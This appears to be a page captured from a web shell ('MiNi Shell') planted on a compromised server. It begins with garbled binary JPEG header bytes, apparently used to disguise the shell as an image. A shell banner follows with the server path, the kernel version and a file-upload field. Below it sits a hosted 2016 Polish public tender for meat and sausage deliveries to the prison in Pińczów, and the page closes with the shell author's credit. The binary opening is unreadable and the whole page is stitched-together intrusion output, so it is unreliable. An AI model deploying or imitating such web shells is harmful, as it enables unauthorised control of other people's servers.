JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160414/40659-N-2016.html

<p class="kh_header"><b>Pińczów: Dostawy mięs, wędlin, drobiu do Zakładu Karnego w Pińczowie</b><br>
<b>Numer ogłoszenia: 40659 - 2016; data zamieszczenia: 14.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Pińczowie , ul. 3-go  Maja 34, 28-400 Pińczów, woj. świętokrzyskie, tel. 041 3577372, faks 041 3577373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieziennictwo.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy mięs, wędlin, drobiu do Zakładu Karnego w Pińczowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Baleron drobiowy ilość roczna 400kg,PN-A- 86526, kod CPV-15131135-0
        2.   Biodrówka wieprzowa-surowa z kością ilość roczna 1500kg, PN-86/A-82002, kod             
            CPV-15113000-3 
  3.  Boczek mielony wędzony ilość roczna 1400kg, PN-A-82007, kod CPV-15131130-5
  4.  Boczek wędzony ilość roczna 1800kg,PN-A-82007, kod CPV-15131130-5
  5.  Karkówka bez kości - surowa, ilość roczna 300kg,PN-86/A-82002, kod CPV-   
      15113000-3
  6.   Kaszanka z kaszy jęczmiennej ilość roczna 3400kg, PN-A-82007,kod CPV-15131134-3
  7.   Kiełbasa biała parzona ilość roczna 2000kg,PN-A-82007, kod CPV15131130-5
  8.   Kiełbasa drobiowa (bez dodatku wieprzowiny) ilość roczna 1400kg, kod CPV-
      15131135-0
  9.   Kiełbasa krakowska ilość roczna 500kg,PN-A-82007, kod CPV-15131130-5
 10. Kiełbasa mielona ilość roczna 3000kg,PN-A-82007, kod CPV-15131130-5
 11. Kiełbasa szynkowa wołowa ilość roczna 200kg, PN-A-82007, kod CPV-15131132-9
 12. Kiełbasa wiejska ilość roczna 500kg, PN-A-82007, kod CPV-15131130-5
 13. Kiełbasa zwyczajna ilość roczna 4300kg,PN-A-82007, kod CPV-15131130-5
 14. Kiełbasa żywiecka ilość roczna 500kg,PN-A-82007, kod CPV-15131130-5
       15. Kiełbasa serwolatka ilość roczna 1400kg, PN-A-82007, kod CPV-15131130-5
 16. Kiełbasa czosnkowa ilość roczna 1000kg, PN-A-82007, kod CPV-15131130-5
 17. Kiełbasa krakowska-drobiowa ilość roczna 700kg,PN-A-86526, kod CPV-15131130-5
       18. Kiełbasa zielonogórska ilość roczna 250kg, PN-A-82007, kod CPV-15131130-5
       19. Mięso  drobne, gulaszowe, wieprzowe, surowe,  ilość roczna 4500kg,PN-86/A-82002,  
             kod    CPV-15113000-3 
 20. Mortadela ilość roczna 3400kg,PN-A-82007, kod CPV-15131130-5
 21. Parówka wieprzowa ilość roczna 2500kg, PN-A-82007, kod CPV-15131130-5
 22. Pasztet pieczony wieprzowy ilość roczna 1400kg, PN-A-82007, kod CPV-15131310-1
 23. Pasztetowa ilość roczna 1400kg, PN-A-82007, kod CPV-15131130-5
 24. Pieczeń rzymska ilość roczna 3000kg, PN-A-82007, kod CPV15131130-5
 25. Parówka drobiowa (bez dodatku mięsa wieprzowego) ilość roczna 1400kg,  kod CPV-  
       15131130-5
 26. Podgardle wędzone ilość roczna 1200kg, PN-86 A-82002, kod CPV-15113000-3 
       27. Piersi  z kurczaka ilość roczna 200kg, , PN-92-/R78550, kod CPV-15112210-1
 28. Salceson włoski ilość roczna 1200kg,PN-A-82007, kod CPV-15131130-5
 29. Schab bez kości, surowy,  ilość roczna 100kg, PN-86/A-82002, kod CPV-15113000-3
 30. Szynka kanapkowa ilość roczna 200kg, PN-A-82007, kod CPV-15131410-2
 31. Szynka mielona ilość roczna 1400kg, PN-A-82007, kod CPV-15131410-2
 32. Szynka tyrolska ilość roczna 1400kg, PN-A-82007, kod CPV-15131410-2
 33. Szynka wieprzowa biała  ilość roczna 300kg, PN-A-82007, kod CPV-15131210-0
 34. Serca wieprzowe, surowe, ilość roczna 1400kg, PN-86/A-82004, kod CPV- 15114000-0
 35. Szynka delikatesowa ilość roczna 200kg, PN-A-82007, kod CPV- 15131410-2
 36. Szynka z indyka ilość roczna 250kg, PN-A- 86526, kod CPV-15131410-2
 37. Szynka śniadaniowa ilość roczna 250kg, PN-A-82007, kod CPV-15131410-2 
       38. Smalec zwykły w opakowaniu do 3kg, kod CPV 15412100-0: roczna ilość około 
             1500kg, 
       39. Smalec domowy  w opakowaniu do 3kg, kod CPV 15412100-0: roczna ilość około 
        
             400kg, 
  40. Wołowina bez kości klasa II, surowa, ilość roczna 3000kg, PN-88/A-82003, 
              kod CPV-15111000-9
  41. Wątroba wieprzowa,surowa, ilość roczna 1800kg, PN-86/A-82004, kodCPV15114000-0
  42. Wołowina pieczeniowa-surowa, ilość roczna 350kg, PN-88/A-82003,kod                   
        CPV-15111000-9
  43. Udziec drobiowy z kością  ilość roczna 3300kg, PN-92-R78550, kod CPV-15112210-1.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.13.11.30-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium  w wysokości: 10 000,00zł.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Opis warunków udziału w postępowaniu i opis sposobu dokonywania oceny  spełniania tych warunków.
1). O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią nw, warunki dotyczące  (art.22 ust.1 ustawy):
- Posiadania  uprawnień do wykonywania  określonej działalności lub czynności, jeżeli przepisy prawa  nakładają obowiązek ich posiadania;
-  Posiadania wiedzy i  doświadczenia; 
- Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do 
   wykonania zamówienia;
-  Sytuacji ekonomicznej i finansowej.
2). Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1  ustawy.      
3). Zaoferują realizację pełnego asortymentu składającego się na całość  zamówienia. 
4). Spełnią wszystkie wymagania wynikające z oświadczeń i dokumentów..
5). Złożą wszystkie dokumenty i oświadczenia wyszczególnione w SIWZ. 
6).Utrzymają stałe ceny podane w Formularzu Ofertowym przez okres 12 miesięcy licząc od daty podpisania umowy. 
7). Wpłacą/ Wniosą  w terminie wymagane wadium. 
Oferty zostaną sprawdzone czy zostały sporządzone zgodnie z przepisami ustawowymi 
i postanowieniami specyfikacji istotnych warunków zamówienia, a następnie ocenione zgodnie z kryteriami i warunkami zawartymi w specyfikacji istotnych warunków zamówienia na zasadzie: wykazał/ nie wykazał. Nie  spełnienie  chociażby  jednego  z w/w  warunków  skutkować  będzie  wykluczeniem  wykonawcy z postępowania      o udzielnie zamówienia. Spełnienie warunków udziału w postępowaniu będzie oceniane na podstawie  oświadczeń i dokumentów złożonych z ofertą (wykazał/ nie wykazał). 
Wykaz   oświadczeń i dokumentów  jakie mają dostarczyć Wykonawcy z ofertą w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
1.) W zakresie wykazania spełnienia przez wykonawcę warunków, o których w art.22 ust.1 ustawy,  Oświadczenia- zał. nr 1 do SIWZ   o spełnieniu warunków udziału w postępowaniu. 
2). W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24ust.1 ustawy, oprócz Oświadczenia o braku podstaw do wykluczenia - zał. nr 2 do SIWZ     należy złożyć: 
- aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków,  lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.       
 - aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu-wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.       
Uwaga: Dokumenty wymieniony w pkt. 2    składa się w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę (osoby) upoważnioną do reprezentowania Wykonawcy i podpisania oferty.   
3). Informację  zgodnie z art.26 ust.2d ustawy-  zał. nr 3 do niniejszej SIWZ.   
4). Formularz Ofertowy stanowiący załącznik nr 4 do niniejszej SIWZ.
5.  Dowód wpłacenia/wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności faktur - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia nieodpłatnie  na pisemny wniosek zainteresowanego  można odebrać w siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2016 godzina 08:30, miejsce: Oferty należy składać w siedzibie Zamawiającego - sekretariat Zakładu Karnego w Pińczowie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com